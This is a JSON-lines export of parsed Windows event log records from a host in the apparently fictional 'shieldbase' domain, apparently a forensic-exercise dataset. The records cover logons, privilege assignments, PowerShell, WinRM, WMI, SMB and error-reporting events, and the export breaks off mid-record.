{"ChunkNumber":229,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":\"0, WindowsUpdateFailure3, Not available, 0, 10.0.16299.98, 80240437, 00000000-0000-0000-0000-000000000000, Scan, 0, 0, 0, Acquisition;Microsoft.WindowsStore_8wekyb3d8bbwe, {855E8A7C-ECB4-4CA3-B045-1DFA50104289}, 0, \\n\\\\\\\\?\\\\C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\WER\\\\Temp\\\\WERCDD5.tmp.WERInternalMetadata.xml, C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\WER\\\\ReportQueue\\\\NonCritical_10.0.16299.98_c1b9de98742315dd6328144518611d70ae588dde_00000000_104f8f25, 0, 2b27f9f4-79fd-475d-ae99-3726f92510f7, 524388\",\"Binary\":\"\"}}","Channel":"Application","Provider":"Windows Error Reporting","EventId":1001,"EventRecordId":"262246","ProcessId":0,"ThreadId":0,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Application.evtx","TimeCreated":"2018-09-04T17:25:02.3965619+00:00","RecordNumber":262246}
{"PayloadData1":"Target: \\tdungan@stark-research-labs.com","PayloadData2":"TargetServerName: base-mail.shieldbase.lan","PayloadData3":"PID: 0x1FC0","UserName":"shieldbase\\tdungan","RemoteHost":"172.16.4.6:443","ExecutableInfo":"C:\\Program Files (x86)\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE","MapDescription":"A logon was attempted using explicit credentials","ChunkNumber":602,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"SubjectUserSid\",\"#text\":\"S-1-5-21-3445421715-2530590580-3149308974-1116\"},{\"@Name\":\"SubjectUserName\",\"#text\":\"tdungan\"},{\"@Name\":\"SubjectDomainName\",\"#text\":\"shieldbase\"},{\"@Name\":\"SubjectLogonId\",\"#text\":\"0xC9FAE\"},{\"@Name\":\"LogonGuid\",\"#text\":\"00000000-0000-0000-0000-000000000000\"},{\"@Name\":\"TargetUserName\",\"#text\":\"tdungan@stark-research-labs.com\"},{\"@Name\":\"TargetDomainName\"},{\"@Name\":\"TargetLogonGuid\",\"#text\":\"00000000-0000-0000-0000-000000000000\"},{\"@Name\":\"TargetServerName\",\"#text\":\"base-mail.shieldbase.lan\"},{\"@Name\":\"TargetInfo\",\"#text\":\"base-mail.shieldbase.lan\"},{\"@Name\":\"ProcessId\",\"#text\":\"0x1FC0\"},{\"@Name\":\"ProcessName\",\"#text\":\"C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\Office16\\\\OUTLOOK.EXE\"},{\"@Name\":\"IpAddress\",\"#text\":\"172.16.4.6\"},{\"@Name\":\"IpPort\",\"#text\":\"443\"}]}}","Channel":"Security","Provider":"Microsoft-Windows-Security-Auditing","EventId":4648,"EventRecordId":"53950","ProcessId":772,"ThreadId":10716,"Level":0,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Security.evtx","TimeCreated":"2018-09-04T10:36:07.1812918+00:00","RecordNumber":53950}
{"PayloadData1":"PID: 3940","PayloadData2":"Path: C:\\Windows\\System32\\wbem\\WmiPerfInst.dll","MapDescription":"WMI wmiprvse execution","ChunkNumber":26,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"UserData\":{\"Operation_StartedOperational\":{\"ProviderName\":\"WmiPerfInst\",\"Code\":\"0x0\",\"HostProcess\":\"wmiprvse.exe\",\"ProcessID\":\"3940\",\"ProviderPath\":\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPerfInst.dll\"}}}","UserId":"S-1-5-19","Channel":"Microsoft-Windows-WMI-Activity/Operational","Provider":"Microsoft-Windows-WMI-Activity","EventId":5857,"EventRecordId":"7519","ProcessId":3940,"ThreadId":7996,"Level":0,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx","TimeCreated":"2018-08-31T12:57:41.4440919+00:00","RecordNumber":7519}
{"PayloadData1":"SeAssignPrimaryTokenPrivilege, SeTcbPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeDebugPrivilege, SeAuditPrivilege, SeSystemEnvironmentPrivilege, SeImpersonatePrivilege, SeDelegateSessionUserImpersonatePrivilege","UserName":"NT AUTHORITY\\SYSTEM (S-1-5-18)","MapDescription":"Administrative logon","ChunkNumber":612,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"SubjectUserSid\",\"#text\":\"S-1-5-18\"},{\"@Name\":\"SubjectUserName\",\"#text\":\"SYSTEM\"},{\"@Name\":\"SubjectDomainName\",\"#text\":\"NT AUTHORITY\"},{\"@Name\":\"SubjectLogonId\",\"#text\":\"0x3E7\"},{\"@Name\":\"PrivilegeList\",\"#text\":\"SeAssignPrimaryTokenPrivilege, SeTcbPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeDebugPrivilege, SeAuditPrivilege, SeSystemEnvironmentPrivilege, SeImpersonatePrivilege, SeDelegateSessionUserImpersonatePrivilege\"}]}}","Channel":"Security","Provider":"Microsoft-Windows-Security-Auditing","EventId":4672,"EventRecordId":"54691","ProcessId":772,"ThreadId":828,"Level":0,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Security.evtx","TimeCreated":"2018-09-05T01:45:58.1432546+00:00","RecordNumber":54691}
{"ChunkNumber":11,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":{\"@Name\":\"ServiceName\",\"#text\":\"Microsoft Passport\"}}}","UserId":"S-1-5-18","Channel":"Microsoft-Windows-HelloForBusiness/Operational","Provider":"Microsoft-Windows-HelloForBusiness","EventId":8025,"EventRecordId":"1710","ProcessId":1064,"ThreadId":7020,"Level":16,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-HelloForBusiness%4Operational.evtx","TimeCreated":"2018-08-30T19:08:59.4336930+00:00","RecordNumber":1710}
{"ChunkNumber":370,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"SubjectUserSid\",\"#text\":\"S-1-5-21-3445421715-2530590580-3149308974-1116\"},{\"@Name\":\"SubjectUserName\",\"#text\":\"tdungan\"},{\"@Name\":\"SubjectDomainName\",\"#text\":\"shieldbase\"},{\"@Name\":\"SubjectLogonId\",\"#text\":\"0x153003\"},{\"@Name\":\"ProviderName\",\"#text\":\"Microsoft Software Key Storage Provider\"},{\"@Name\":\"AlgorithmName\",\"#text\":\"RSA\"},{\"@Name\":\"KeyName\",\"#text\":\"TB_0_sharepoint.com\"},{\"@Name\":\"KeyType\",\"#text\":\"%%2500\"},{\"@Name\":\"Operation\",\"#text\":\"%%2480\"},{\"@Name\":\"ReturnCode\",\"#text\":\"0x0\"}]}}","Channel":"Security","Provider":"Microsoft-Windows-Security-Auditing","EventId":5061,"EventRecordId":"34717","ProcessId":776,"ThreadId":576,"Level":0,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Security.evtx","TimeCreated":"2018-08-09T01:07:41.0437860+00:00","RecordNumber":34717}
{"ChunkNumber":20,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"Message\",\"#text\":\"Invoking license manager because license/lease polling time up: PFN Microsoft.WindowsFeedbackHub_1.1712.1141.0_x64__8wekyb3d8bbwe\"},{\"@Name\":\"Function\",\"#text\":\"InvokeLicenseManagerRequired\"},{\"@Name\":\"Source\",\"#text\":\"onecoreuap\\\\enduser\\\\winstore\\\\licensemanager\\\\apisethost\\\\activationapis.cpp\"},{\"@Name\":\"Line Number\",\"#text\":\"331\"}]}}","UserId":"S-1-5-18","Channel":"Microsoft-Windows-Store/Operational","Provider":"Microsoft-Windows-Store","EventId":8001,"EventRecordId":"254333","ProcessId":868,"ThreadId":7788,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-Store%4Operational.evtx","TimeCreated":"2018-09-03T11:54:48.2119455+00:00","RecordNumber":254333}
{"ChunkNumber":11,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"Event\",\"#text\":\"8\"},{\"@Name\":\"SubscriberName\",\"#text\":\"SessionEnv\"}]}}","UserId":"S-1-5-21-3445421715-2530590580-3149308974-1193","Channel":"Microsoft-Windows-Winlogon/Operational","Provider":"Microsoft-Windows-Winlogon","EventId":812,"EventRecordId":"1800","ProcessId":9576,"ThreadId":2628,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-Winlogon%4Operational.evtx","TimeCreated":"2018-09-05T13:48:28.9484015+00:00","RecordNumber":1800}
{"PayloadData1":"SeSecurityPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeTakeOwnershipPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeLoadDriverPrivilege, SeImpersonatePrivilege, SeDelegateSessionUserImpersonatePrivilege","UserName":"shieldbase\\BASE-RD-01$ (S-1-5-18)","MapDescription":"Administrative logon","ChunkNumber":254,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"SubjectUserSid\",\"#text\":\"S-1-5-18\"},{\"@Name\":\"SubjectUserName\",\"#text\":\"BASE-RD-01$\"},{\"@Name\":\"SubjectDomainName\",\"#text\":\"shieldbase\"},{\"@Name\":\"SubjectLogonId\",\"#text\":\"0x2836DD11\"},{\"@Name\":\"PrivilegeList\",\"#text\":\"SeSecurityPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeTakeOwnershipPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeLoadDriverPrivilege, SeImpersonatePrivilege, SeDelegateSessionUserImpersonatePrivilege\"}]}}","Channel":"Security","Provider":"Microsoft-Windows-Security-Auditing","EventId":4672,"EventRecordId":"24368","ProcessId":744,"ThreadId":1328,"Level":0,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Security.evtx","TimeCreated":"2018-07-10T20:49:52.3553877+00:00","RecordNumber":24368}
{"ChunkNumber":38,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":\"\\tDetailSequence=1\\n\\tDetailTotal=1\\n\\n\\tSequenceNumber=2857\\n\\n\\tUserId=shieldbase\\\\cbarton-a\\n\\tHostName=ServerRemoteHost\\n\\tHostVersion=1.0.0.0\\n\\tHostId=d9ac080b-6acf-4f30-80eb-6d19ec09810f\\n\\tHostApplication=C:\\\\WINDOWS\\\\system32\\\\wsmprovhost.exe -Embedding\\n\\tEngineVersion=5.1.16299.547\\n\\tRunspaceId=d485f447-a557-44b0-8d6f-46ed4e132a9a\\n\\tPipelineId=31\\n\\tScriptName=\\n\\tCommandLine=, CommandInvocation(Out-String): \\\"Out-String\\\"\\nCommandInvocation(Out-String): \\\"Out-String\\\"\\n\",\"Binary\":\"\"}}","Channel":"Windows PowerShell","Provider":"PowerShell","EventId":800,"EventRecordId":"1637","ProcessId":0,"ThreadId":0,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Windows PowerShell.evtx","TimeCreated":"2018-08-15T07:18:27.4807050+00:00","RecordNumber":1637}
{"ChunkNumber":192,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":\"0, WindowsUpdateFailure3, Not available, 0, 10.0.16299.522, 8024000b, 6FE34377-744E-4CB3-B041-5B1558786688, Download, 1, 0, 0, Update;taskhostw, {855E8A7C-ECB4-4CA3-B045-1DFA50104289}, 0, \\n\\\\\\\\?\\\\C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\WER\\\\Temp\\\\WERB327.tmp.WERInternalMetadata.xml, C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\WER\\\\ReportQueue\\\\NonCritical_10.0.16299.522_8e0506fc7409242b0e4fba862b89421e61c0e9_00000000_6eea4e86, 0, 4932decc-c67a-4280-9ce5-daddfcbe18e0, 524388\",\"Binary\":\"\"}}","Channel":"Application","Provider":"Windows Error Reporting","EventId":1001,"EventRecordId":"259895","ProcessId":0,"ThreadId":0,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Application.evtx","TimeCreated":"2018-09-04T05:24:33.2746771+00:00","RecordNumber":259895}
{"ChunkNumber":15,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"Reason\",\"#text\":\"4\"},{\"@Name\":\"Status\",\"#text\":\"3221225653\"},{\"@Name\":\"ServerNameLength\",\"#text\":\"9\"},{\"@Name\":\"ServerName\",\"#text\":\"base-file\"},{\"@Name\":\"AddressLength\",\"#text\":\"16\"},{\"@Name\":\"RemoteAddress\",\"#text\":\"02-00-01-BD-0A-0A-04-05-00-00-00-00-00-00-00-00\"},{\"@Name\":\"LocalAddress\",\"#text\":\"02-00-00-00-AC-10-06-0B-00-00-00-00-00-00-00-00\"},{\"@Name\":\"InstanceNameLength\",\"#text\":\"24\"},{\"@Name\":\"InstanceName\",\"#text\":\"\\\\Device\\\\LanmanRedirector\"},{\"@Name\":\"ConnectionType\",\"#text\":\"1\"}]}}","UserId":"S-1-5-18","Channel":"Microsoft-Windows-SmbClient/Connectivity","Provider":"Microsoft-Windows-SMBClient","EventId":30822,"EventRecordId":"1980","ProcessId":4,"ThreadId":2904,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx","TimeCreated":"2018-07-12T08:29:02.0004890+00:00","RecordNumber":1980}
{"ChunkNumber":5,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":{\"@Name\":\"GPOList\",\"#text\":\"Default Domain Policy, \"}}}","UserId":"S-1-5-18","Channel":"Microsoft-Windows-Security-Audit-Configuration-Client/Operational","Provider":"Microsoft-Windows-Security-Audit-Configuration-Client","EventId":102,"EventRecordId":"635","ProcessId":8,"ThreadId":9588,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-Security-Audit-Configuration-Client%4Operational.evtx","TimeCreated":"2018-06-28T00:49:53.1160256+00:00","RecordNumber":635}
{"ChunkNumber":2,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"ErrorCode\",\"#text\":\"0x80070005\"},{\"@Name\":\"UserSID\",\"#text\":\"<machine>\"},{\"@Name\":\"Name\",\"#text\":\"Software\\\\Classes\\\\Local Settings\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\AppModel\\\\Repository\\\\Families\\\\Windows.MiracastView_cw5n1h2txyewy\"}]}}","UserId":"S-1-5-18","Channel":"Microsoft-Windows-StateRepository/Operational","Provider":"Microsoft-Windows-StateRepository","EventId":253,"EventRecordId":"328","ProcessId":3676,"ThreadId":1816,"Level":2,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-StateRepository%4Operational.evtx","TimeCreated":"2018-05-14T12:14:54.1764768+00:00","RecordNumber":328}
{"PayloadData1":"Task \\Microsoft\\Office\\OfficeBackgroundTaskHandlerRegistration","PayloadData3":"Instance Id 15600223-c357-4cf7-ac9b-f0e315448085","ExecutableInfo":"C:\\Program Files (x86)\\Microsoft Office\\root\\Office16\\officebackgroundtaskhandler.exe","MapDescription":"Scheduled task completed","ChunkNumber":196,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"@Name\":\"ActionSuccess\",\"Data\":[{\"@Name\":\"TaskName\",\"#text\":\"\\\\Microsoft\\\\Office\\\\OfficeBackgroundTaskHandlerRegistration\"},{\"@Name\":\"TaskInstanceId\",\"#text\":\"15600223-c357-4cf7-ac9b-f0e315448085\"},{\"@Name\":\"ActionName\",\"#text\":\"C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\Office16\\\\officebackgroundtaskhandler.exe\"},{\"@Name\":\"ResultCode\",\"#text\":\"0\"},{\"@Name\":\"EnginePID\",\"#text\":\"6096\"}]}}","UserId":"S-1-5-18","Channel":"Microsoft-Windows-TaskScheduler/Operational","Provider":"Microsoft-Windows-TaskScheduler","EventId":201,"EventRecordId":"203425","ProcessId":556,"ThreadId":3848,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-TaskScheduler%4Operational.evtx","TimeCreated":"2018-09-01T13:53:56.5013775+00:00","RecordNumber":203425}
{"ChunkNumber":15,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":{\"@Name\":\"ServiceName\",\"#text\":\"Microsoft Passport\"}}}","UserId":"S-1-5-18","Channel":"Microsoft-Windows-HelloForBusiness/Operational","Provider":"Microsoft-Windows-HelloForBusiness","EventId":8025,"EventRecordId":"2227","ProcessId":1064,"ThreadId":5144,"Level":16,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-HelloForBusiness%4Operational.evtx","TimeCreated":"2018-09-02T08:54:36.3217597+00:00","RecordNumber":2227}
{"ChunkNumber":53,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":{\"@Name\":\"operationName\",\"#text\":\"Enumeration\"}}}","UserId":"S-1-5-20","Channel":"Microsoft-Windows-WinRM/Operational","Provider":"Microsoft-Windows-WinRM","EventId":132,"EventRecordId":"273331","ProcessId":1100,"ThreadId":2832,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-WinRM%4Operational.evtx","TimeCreated":"2018-09-01T17:35:18.3349602+00:00","RecordNumber":273331}
{"ChunkNumber":28,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"SubjectUserSid\",\"#text\":\"S-1-5-18\"},{\"@Name\":\"SubjectUserName\",\"#text\":\"BASE-RD-01$\"},{\"@Name\":\"SubjectDomainName\",\"#text\":\"shieldbase\"},{\"@Name\":\"SubjectLogonId\",\"#text\":\"0x3E7\"},{\"@Name\":\"ProviderName\",\"#text\":\"Microsoft Software Key Storage Provider\"},{\"@Name\":\"AlgorithmName\",\"#text\":\"RSA\"},{\"@Name\":\"KeyName\",\"#text\":\"11599fbd-f88e-f9bb-fa76-1c9eb609a6e8\"},{\"@Name\":\"KeyType\",\"#text\":\"%%2500\"},{\"@Name\":\"Operation\",\"#text\":\"%%2480\"},{\"@Name\":\"ReturnCode\",\"#text\":\"0x0\"}]}}","Channel":"Security","Provider":"Microsoft-Windows-Security-Auditing","EventId":5061,"EventRecordId":"3092","ProcessId":628,"ThreadId":4728,"Level":0,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Security.evtx","TimeCreated":"2018-05-08T21:34:30.3229141+00:00","RecordNumber":3092}
{"ChunkNumber":38,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":{\"@Name\":\"InfoDescription\",\"#text\":\"%%4115\"}}}","UserId":"S-1-5-21-3445421715-2530590580-3149308974-1116","Channel":"Microsoft-Windows-GroupPolicy/Operational","Provider":"Microsoft-Windows-GroupPolicy","EventId":5320,"EventRecordId":"151799","ProcessId":556,"ThreadId":6936,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx","TimeCreated":"2018-09-02T19:28:27.1916961+00:00","RecordNumber":151799}
{"ChunkNumber":2,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":{\"@Name\":\"operationName\",\"#text\":\"EventDelivery\"}}}","UserId":"S-1-5-20","Channel":"Microsoft-Windows-WinRM/Operational","Provider":"Microsoft-Windows-WinRM","EventId":132,"EventRecordId":"265855","ProcessId":1100,"ThreadId":1236,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-WinRM%4Operational.evtx","TimeCreated":"2018-08-29T17:35:46.6830599+00:00","RecordNumber":265855}
{"ChunkNumber":41,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"ContextInfo\",\"#text\":\"        Severity = Informational,         Host Name = ServerRemoteHost,         Host Version = 1.0.0.0,         Host ID = 3367239b-8f30-4f1e-aec8-b9f8c6869c28,         Host Application = C:\\\\WINDOWS\\\\system32\\\\wsmprovhost.exe -Embedding,         Engine Version = 5.1.16299.547,         Runspace ID = e666d539-477f-456c-a676-f835fdd52d52,         Pipeline ID = 5,         Command Name = Write-Verbose,         Command Type = Cmdlet,         Script Name = ,         Command Path = ,         Sequence Number = 2328,         User = shieldbase\\\\cbarton-a,         Connected User = shieldbase\\\\cbarton-a,         Shell ID = Microsoft.PowerShell, \"},{\"@Name\":\"UserData\"},{\"@Name\":\"Payload\",\"#text\":\"CommandInvocation(Write-Verbose): \\\"Write-Verbose\\\", ParameterBinding(Write-Verbose): name=\\\"Message\\\"; value=\\\"Adding 54FFD262-99FE-4576-96E7-1ADB500370DC:Microsoft-Windows-Wordpad to $LogProviders hash.\\\", \"}]}}","UserId":"S-1-5-21-3445421715-2530590580-3149308974-1185","Channel":"Microsoft-Windows-PowerShell/Operational","Provider":"Microsoft-Windows-PowerShell","EventId":4103,"EventRecordId":"5695","ProcessId":14292,"ThreadId":3384,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-PowerShell%4Operational.evtx","TimeCreated":"2018-08-15T16:32:43.8300320+00:00","RecordNumber":5695}
{"ChunkNumber":3,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"FailureTime\",\"#text\":\"2018-08-06 19:27:22.9680151\"},{\"@Name\":\"StackHash\",\"#text\":\"0xC374C042\"}]}}","UserId":"S-1-5-18","Channel":"Microsoft-Windows-Security-LessPrivilegedAppContainer/Operational","Provider":"Microsoft-Windows-Security-LessPrivilegedAppContainer","EventId":1,"EventRecordId":"443","ProcessId":3596,"ThreadId":5040,"Level":2,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-Security-LessPrivilegedAppContainer%4Operational.evtx","TimeCreated":"2018-08-06T19:27:22.9680151+00:00","RecordNumber":443}
{"PayloadData1":"HostApplication=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -Version 5.1 -s -NoLogo -NoProfile","PayloadData2":"HostName=Default Host","PayloadData3":"HostVersion=5.1.16299.547","MapDescription":"Provider is Started.","ChunkNumber":79,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":\"Function, Started, \\tProviderName=Function\\n\\tNewProviderState=Started\\n\\n\\tSequenceNumber=61\\n\\n\\tHostName=Default Host\\n\\tHostVersion=5.1.16299.547\\n\\tHostId=8ed6daf1-21b4-48ae-b89f-020af167d8cc\\n\\tHostApplication=C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe -Version 5.1 -s -NoLogo -NoProfile\\n\\tEngineVersion=\\n\\tRunspaceId=\\n\\tPipelineId=\\n\\tCommandName=\\n\\tCommandType=\\n\\tScriptName=\\n\\tCommandPath=\\n\\tCommandLine=\",\"Binary\":\"\"}}","Channel":"Windows PowerShell","Provider":"PowerShell","EventId":600,"EventRecordId":"2868","ProcessId":0,"ThreadId":0,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Windows PowerShell.evtx","TimeCreated":"2018-08-15T07:19:21.7169762+00:00","RecordNumber":2868}
{"ChunkNumber":66,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"operationName\",\"#text\":\"Enumeration\"},{\"@Name\":\"resourceUri\",\"#text\":\"http://schemas.microsoft.com/wbem/wsman/1/SubscriptionManager/Subscription\"}]}}","UserId":"S-1-5-20","Channel":"Microsoft-Windows-WinRM/Operational","Provider":"Microsoft-Windows-WinRM","EventId":145,"EventRecordId":"275204","ProcessId":1100,"ThreadId":1524,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-WinRM%4Operational.evtx","TimeCreated":"2018-09-02T11:10:03.0227452+00:00","RecordNumber":275204}
{"ChunkNumber":16,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"Reason\",\"#text\":\"4\"},{\"@Name\":\"Status\",\"#text\":\"3221225653\"},{\"@Name\":\"ServerNameLength\",\"#text\":\"9\"},{\"@Name\":\"ServerName\",\"#text\":\"base-file\"},{\"@Name\":\"AddressLength\",\"#text\":\"16\"},{\"@Name\":\"RemoteAddress\",\"#text\":\"02-00-01-BD-0A-0A-04-05-00-00-00-00-00-00-00-00\"},{\"@Name\":\"LocalAddress\",\"#text\":\"02-00-00-00-AC-10-06-0B-00-00-00-00-00-00-00-00\"},{\"@Name\":\"InstanceNameLength\",\"#text\":\"24\"},{\"@Name\":\"InstanceName\",\"#text\":\"\\\\Device\\\\LanmanRedirector\"},{\"@Name\":\"ConnectionType\",\"#text\":\"1\"}]}}","UserId":"S-1-5-18","Channel":"Microsoft-Windows-SmbClient/Connectivity","Provider":"Microsoft-Windows-SMBClient","EventId":30822,"EventRecordId":"2073","ProcessId":4,"ThreadId":692,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx","TimeCreated":"2018-07-12T23:59:40.0277981+00:00","RecordNumber":2073}
{"ChunkNumber":50,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"operationName\",\"#text\":\"Enumeration\"},{\"@Name\":\"resourceUri\",\"#text\":\"http://schemas.microsoft.com/wbem/wsman/1/windows/shell\"}]}}","UserId":"S-1-5-18","Channel":"Microsoft-Windows-WinRM/Operational","Provider":"Microsoft-Windows-WinRM","EventId":145,"EventRecordId":"272916","ProcessId":556,"ThreadId":348,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-WinRM%4Operational.evtx","TimeCreated":"2018-09-01T13:41:54.2389287+00:00","RecordNumber":272916}
{"ChunkNumber":5,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"Event\",\"#text\":\"0\"},{\"@Name\":\"SubscriberName\",\"#text\":\"TermSrv\"}]}}","UserId":"S-1-5-18","Channel":"Microsoft-Windows-Winlogon/Operational","Provider":"Microsoft-Windows-Winlogon","EventId":811,"EventRecordId":"857","ProcessId":5068,"ThreadId":11744,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-Winlogon%4Operational.evtx","TimeCreated":"2018-07-18T15:05:24.9647569+00:00","RecordNumber":857}
{"PayloadData1":"Path: ","PayloadData2":"ScriptBlockText: Set-Alias -Name scim -Value Set-CimInstance -Option ReadOnly, AllScope -ErrorAction SilentlyContinue","MapDescription":"Contains contents of scripts run","ChunkNumber":232,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"MessageNumber\",\"#text\":\"1\"},{\"@Name\":\"MessageTotal\",\"#text\":\"1\"},{\"@Name\":\"ScriptBlockText\",\"#text\":\"Set-Alias -Name scim -Value Set-CimInstance -Option ReadOnly, AllScope -ErrorAction SilentlyContinue\"},{\"@Name\":\"ScriptBlockId\",\"#text\":\"f42c3973-ad15-464d-9c3d-65db9136ba32\"},{\"@Name\":\"Path\"}]}}","UserId":"S-1-5-21-3445421715-2530590580-3149308974-1183","Channel":"Microsoft-Windows-PowerShell/Operational","Provider":"Microsoft-Windows-PowerShell","EventId":4104,"EventRecordId":"10389","ProcessId":15464,"ThreadId":10880,"Level":5,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-PowerShell%4Operational.evtx","TimeCreated":"2018-08-28T20:00:03.6640008+00:00","RecordNumber":10389}
{"PayloadData1":"Target: NT AUTHORITY\\SYSTEM","PayloadData2":"LogonType 5","UserName":"shieldbase\\BASE-RD-01$","RemoteHost":"- (-)","ExecutableInfo":"C:\\Windows\\System32\\services.exe","MapDescription":"Successful logon","ChunkNumber":601,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"SubjectUserSid\",\"#text\":\"S-1-5-18\"},{\"@Name\":\"SubjectUserName\",\"#text\":\"BASE-RD-01$\"},{\"@Name\":\"SubjectDomainName\",\"#text\":\"shieldbase\"},{\"@Name\":\"SubjectLogonId\",\"#text\":\"0x3E7\"},{\"@Name\":\"TargetUserSid\",\"#text\":\"S-1-5-18\"},{\"@Name\":\"TargetUserName\",\"#text\":\"SYSTEM\"},{\"@Name\":\"TargetDomainName\",\"#text\":\"NT AUTHORITY\"},{\"@Name\":\"TargetLogonId\",\"#text\":\"0x3E7\"},{\"@Name\":\"LogonType\",\"#text\":\"5\"},{\"@Name\":\"LogonProcessName\",\"#text\":\"Advapi  